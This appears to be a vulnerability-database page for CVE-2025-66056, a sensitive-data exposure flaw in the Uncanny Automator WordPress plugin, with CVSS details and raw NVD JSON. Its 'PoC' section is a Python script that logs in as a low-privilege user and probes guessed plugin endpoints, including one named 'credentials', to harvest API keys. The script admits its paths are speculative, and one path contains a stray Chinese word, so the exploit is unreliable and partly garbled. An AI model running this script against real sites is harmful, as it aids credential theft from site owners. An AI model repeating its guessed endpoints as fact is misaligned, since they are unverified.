Security Vulnerability Report
中文
CVE-2025-66056 CVSS 4.3 MEDIUM

CVE-2025-66056

Published: 2025-11-21 13:15:46
Last Modified: 2026-04-15 00:35:42

Description

Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Uncanny Owl Uncanny Automator uncanny-automator allows Retrieve Embedded Sensitive Data.This issue affects Uncanny Automator: from n/a through < 6.10.0.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Uncanny Automator < 6.10.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66056 PoC - Uncanny Automator Sensitive Data Exposure # Authenticated low-privilege user can retrieve embedded sensitive data import requests import json target_url = "http://target-wordpress-site.com" username = "low_privilege_user" password = "user_password" # Step 1: Authenticate and get authentication cookies/tokens session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } # Attempt to login login_response = session.post(login_url, data=login_data) # Step 2: Query the Uncanny Automator API endpoint to retrieve sensitive data # The vulnerability allows retrieval of embedded credentials/API keys api_endpoints = [ f"{target_url}/wp-json/uncanny-automator/v1/recipes", f"{target_url}/wp-json/uncanny-automator/v1/配方", f"{target_url}/wp-json/uncanny-automator/v1/credentials", f"{target_url}/wp-admin/admin-ajax.php?action=uncanny-automator-get-recipe-data" ] for endpoint in api_endpoints: try: response = session.get(endpoint, timeout=10) if response.status_code == 200: data = response.json() # Check for sensitive information in response if data and len(str(data)) > 100: print(f"[+] Potential sensitive data found at: {endpoint}") print(f"[+] Response: {json.dumps(data, indent=2)[:500]}") except Exception as e: print(f"[-] Error querying {endpoint}: {e}") print("\n[!] Note: This PoC demonstrates the vulnerability concept.") print("[!] Actual exploitation may require specific API paths based on plugin version.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66056", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:46.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Uncanny Owl Uncanny Automator uncanny-automator allows Retrieve Embedded Sensitive Data.This issue affects Uncanny Automator: from n/a through < 6.10.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/uncanny-automator/vulnerability/wordpress-uncanny-automator-plugin-6-10-0-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}